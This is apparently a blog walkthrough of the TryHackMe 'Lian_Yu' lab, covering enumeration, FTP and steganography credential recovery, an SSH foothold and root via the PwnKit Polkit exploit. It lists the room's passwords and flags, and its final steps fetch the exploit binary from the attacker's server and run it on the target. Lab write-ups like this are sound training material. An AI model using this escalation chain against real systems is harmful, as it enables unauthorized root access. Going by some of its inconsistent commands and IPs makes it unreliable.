Post

TryHackMe: Lian_Yu

Walkthrough of the TryHackMe 'Lian_Yu' room — web and service enumeration, FTP & steganography discovery, SSH foothold, and privilege escalation via PwnKit (Polkit CVE-2021-4034).

Posted Updated
By Aakash Modi
2 min read
TryHackMe: Lian_Yu

TryHackMe: Lian_Yu — Writeup | 17 October 2025

TryHackMe Logo Room Banner

Overview

Lian Yu walks through service/web enumeration, hidden files discovery, FTP access, steganography to reveal secrets, SSH access, and local privilege escalation using a known Polkit exploit (PwnKit).

Reconnaissance & Scanning

Nmap

Full port and service scan:

1

sudo nmap -Pn -T4 -n -sC -p- -oN scan_lian.txt 10.201.37.223

Scan summary (selection):

1
2
3
4
5

21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http  (Title: Purgatory)
111/tcp   open   rpcbind
57960/tcp open   status

Web Enumeration

Run Gobuster to locate hidden directories:

1

gobuster dir -u http://10.201.37.223/ -w /usr/share/wordlists/rockyou.txt -o dir_results.txt -t 25

Gobuster results:

1
2

/island (301) -> /island/
/server-status (403)

Fuzz the island path (4-digit wordlist used):

1

ffuf -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -u https://10.201.37.223/island/FUZZ

Result: found directory 2100

Answer: 2100

Scan directory in 2100

Scan the directory for files (searching for .ticket):

1

gobuster dir -u http://10.201.0.179/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket

Found file: green_arrow.ticket

Answer: green_arrow.ticket

Inside green_arrow.ticket a hash string was observed:

1

RTy8yhBQdscX

After decoding, the FTP password was recovered:

FTP password: !#th3h00d

Answer: !#th3h00d

FTP & Steganography

Connect to FTP with the recovered password. In user vigilante’s home there are image files:

  • Leave_me_alone.png
  • Queen’s_Gambit.png
  • aa.jpg

Repair PNG header and check:

1
2
3

printf '\x89\x50\x4e\x47\x0d\x0a\x1a\x0a' | dd of=Leave_me_alone.png bs=8 conv=notrunc
pngfix -q --outfile Leave_me_alone.png Leave_me_alone.png
pngcheck -vv Leave_me_alone.png

From image metadata we recover the passphrase: password

Use steghide to extract hidden data from aa.jpg:

1

steghide extract -sf aa.jpg    # passphrase: password

This extracts ss.zip. Unzip:

1

unzip ss.zip

Archive contains:

  • passwd.txt
  • shado

From shado the SSH password was recovered:

SSH password: M3tahuman

Answer (SSH password): M3tahuman

SSH Foothold

SSH into the machine (example):

1

ssh slade@10.201.97.206

After login, retrieve user flag:

User flag:

1

THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}

Privilege Escalation to root

Check sudo privileges:

1

sudo -l

Output shows:

1

(root) PASSWD: /usr/bin/pkexec

Because pkexec is allowed, a PwnKit exploit can be used to obtain root.

On attacker machine:

1
2

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
python3 -m http.server 8000

On target (adjust attacker IP):

1
2
3

wget http://10.XX.XX.XX:8000/PwnKit
chmod +x PwnKit
./PwnKit

Verify root:

1
2

whoami
# root

Root flag:

1

THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}

Flags

  • User: THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N’T}
  • Root: THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I’LL_BE_D34D}

Notes:

  • Keep attacker IPs and exact paths adjusted to your environment.
  • Use these commands responsibly and only in authorized labs.

Room Complete!

Completed

Happy Hacking!

Hacking GIF
TryHackMe
tryhackme walkthrough sql-injection privilege-escalation suid hash-cracking pentesting
This post is licensed under CC BY 4.0 by the author.